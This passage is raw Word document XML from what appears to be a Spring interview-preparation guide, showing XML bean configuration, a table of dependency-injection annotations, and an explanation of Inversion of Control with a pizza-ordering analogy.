    <w:p w14:paraId="60BEC377"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showDepartme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15DA0E6"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p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Department</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF243E9"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34D128B" w14:textId="7E203193"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C2BD1" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CD56E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0E07E28">
          <v:rect id="_x0000_i2056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF9DDB9" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56E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pring DI with XML (Legacy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF30968"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4120490"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;bean</w:t>
      </w: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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"employeeService"</w:t>
      </w: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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"com.example.EmployeeService"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBCD5BE"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412049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lt;constructor-arg</w:t>
      </w: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ref</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"employeeRepository"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A609059"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4120490"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/bean&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E7442" w14:textId="77777777"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4120490"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366FE6CE" w14:textId="76295E9A" w:rsidR="00FF20B2" w:rsidRPr="00CE4B95"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4120490"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;bean</w:t>
      </w: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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"employeeRepository"</w:t>
      </w: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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"com.example.EmployeeRepository"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A66AD" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CD56E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54960D">
          <v:rect id="_x0000_i2057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF1D626" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56E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DI Annotations Us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9"/>
        <w:gridCol w:w="3712"/>
      </w:tblGrid>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="489333F0" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BB14320" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00FF20B2">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nnotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A68FBDE" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00FF20B2">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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="2AF791E6" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="523C522E" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F29A04D" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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clares a class as a Spring bean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="4ABE9ED3" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76A4FBFE" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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rvice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32643E81" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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ecialized version of @Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="6663E7E8" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DDFD4D4" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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pository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EF48A20" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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DAO layers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="591DC0B9" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21C499E8" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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utowired</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E511EF8" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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jects dependencies automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="608E35BF" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65774EA0" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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Qualifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D102CAA" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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solves ambiguity when multiple beans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="3C673BA2" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AB0BEDF" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56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ject / @Resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79974CB9" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56E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ternatives to @Autowired (from JSR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F679B61" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CD56E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B0D6289">
          <v:rect id="_x0000_i2058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C0B6CD" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00CD56E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103192CB" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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pring manages your object dependencies via </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IoC Container</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D931B0" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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define how components interact, and Spring </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wires</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5412C4" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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duces tight coupling and improves code reusability and testability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7760BD45" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0005728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B8A1E9A">
          <v:rect id="_x0000_i2059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E7913" w14:textId="77777777" w:rsidR="00D77330" w:rsidRPr="00CE4B95" w:rsidRDefault="00D77330" w:rsidP="00D77330">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="426" w:name="_Toc196307906"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Spring Inversion of Control (IOC)?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="426"/>
    </w:p>
    <w:p w14:paraId="062927C2" w14:textId="3265B44E" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="0054541D">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version of Control (IoC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a principle where the control of object creation and dependency management is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inverted</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the application code to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring container</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E6E975" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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 plain words:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You don't create objects manually (new keyword); instead, Spring takes care of creating, managing, and injecting dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C971F3E" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A250A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3C56A55">
          <v:rect id="_x0000_i2060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C968389" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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eal-World Analogy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540FBE8" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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agine you're ordering a pizza:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690CC4A7" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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raditional approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You go to the kitchen, make dough, prepare sauce, bake it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E11E8D" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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oC approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You call the pizza shop, place the order, and it gets delivered to you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5DBF92" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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Just like that, in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B0E4A" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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define what you need (dependencies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B02D50" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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pring </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>injects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them into your class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7166D" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A250A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8D21B7">
          <v:rect id="_x0000_i2061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B42E90" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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How IoC Works in Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6B116C" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="00A250A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pring has an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IoC container</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like ApplicationContext) that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22881E2C" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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cans and identifies classes with annotations (@Component, @Service, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA51D4" w14:textId="77777777" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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stantiates them as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>beans</w:t>
      </w:r>
    </w:p>
